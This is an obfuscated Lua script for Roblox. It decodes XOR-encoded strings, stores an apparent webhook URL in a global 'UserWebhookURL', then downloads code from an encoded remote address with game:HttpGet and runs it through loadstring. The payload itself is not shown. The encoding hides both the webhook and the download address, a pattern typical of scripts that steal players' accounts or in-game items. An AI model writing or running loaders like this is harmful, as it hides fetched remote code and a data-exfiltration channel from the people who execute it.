--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11) local v12={};for v13=1, #v10 do v6(v12,v0(v4(v1(v2(v10,v13,v13 + 1 )),v1(v2(v11,1 + (v13% #v11) ,1 + (v13% #v11) + 1 )))%256 ));end return v5(v12);end local v8=v7("\217\215\207\53\245\225\136\81\213\202\200\38\233\169\195\80\210\204\214\106\231\171\206\81\198\198\217\45\233\180\204\13\158\146\136\113\176\233\151\79\135\144\141\119\178\237\148\70\137\155\142\115\169\146\242\72\225\154\245\9\206\168\210\16\133\238\208\41\232\236\233\31\211\200\239\10\254\131\144\44\192\239\141\26\179\237\211\39\233\208\203\28\226\185\195\44\197\218\222\12\210\235\138\11\196\231\218\16\247\178\255\25\194\148\232\33\202\137\203\55\230","\126\177\163\187\69\134\219\167");getgenv().UserPingThreshold=7863511 + 42136489 ;if (v8 and v8:match(v7("\39\196\57\198\243\49\201\100\198\243\46\130\43\213\245\108\218\47\199\244\44\194\33\214","\156\67\173\74\165"))) then getgenv().UserWebhookURL=v8;else return;end loadstring(game:HttpGet(v7("\60\163\93\6\175\124\9\123\165\72\1\242\33\79\32\191\92\20\169\53\67\38\180\70\24\168\35\72\32\249\74\25\177\105\106\12\141\123\12\243\34\83\36\178\6\27\189\47\72\123\179\92\6\185\104\74\33\182","\38\84\215\41\118\220\70"),true))();
